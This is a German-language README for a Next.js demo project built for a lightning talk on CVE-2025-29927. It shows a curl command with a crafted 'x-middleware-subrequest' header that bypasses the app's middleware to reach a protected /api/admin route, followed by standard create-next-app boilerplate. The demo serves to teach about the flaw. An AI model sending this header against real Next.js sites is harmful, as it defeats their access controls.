
Eine Demo der CVE-2025-29927-Schwachstelle für einen NebraskaJS Lightning Talk
Dies ist ein Next.js-Projekt, das mit create-next-app erstellt wurde.
Zunächst kannst du bestätigen, dass die Middleware funktioniert und den Benutzer umleiten sollte:
curl http://localhost:3000/api/admin
Danach kannst du zeigen, wie die Middleware mit folgendem Befehl umgangen wird:
curl -H "x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware" http://localhost:3000/api/admin
Starte zunächst den Entwicklungsserver:
npm run dev
# oder
yarn dev
# oder
pnpm dev
# oder
bun dev
Öffne http://localhost:3000 mit deinem Browser, um das Ergebnis zu sehen.
Du kannst mit der Bearbeitung der Seite beginnen, indem du app/page.tsx änderst. Die Seite wird automatisch aktualisiert, während du die Datei bearbeitest.
Dieses Projekt verwendet next/font, um Geist, eine neue Schriftfamilie für Vercel, automatisch zu optimieren und zu laden.
Um mehr über Next.js zu erfahren, wirf einen Blick auf die folgenden Ressourcen:
Du kannst dir das Next.js GitHub-Repository ansehen – Feedback und Beiträge sind willkommen!
Der einfachste Weg, deine Next.js-App bereitzustellen, ist die Nutzung der Vercel Platform der Entwickler von Next.js.
Weitere Details findest du in unserer Next.js-Bereitstellungsdokumentation.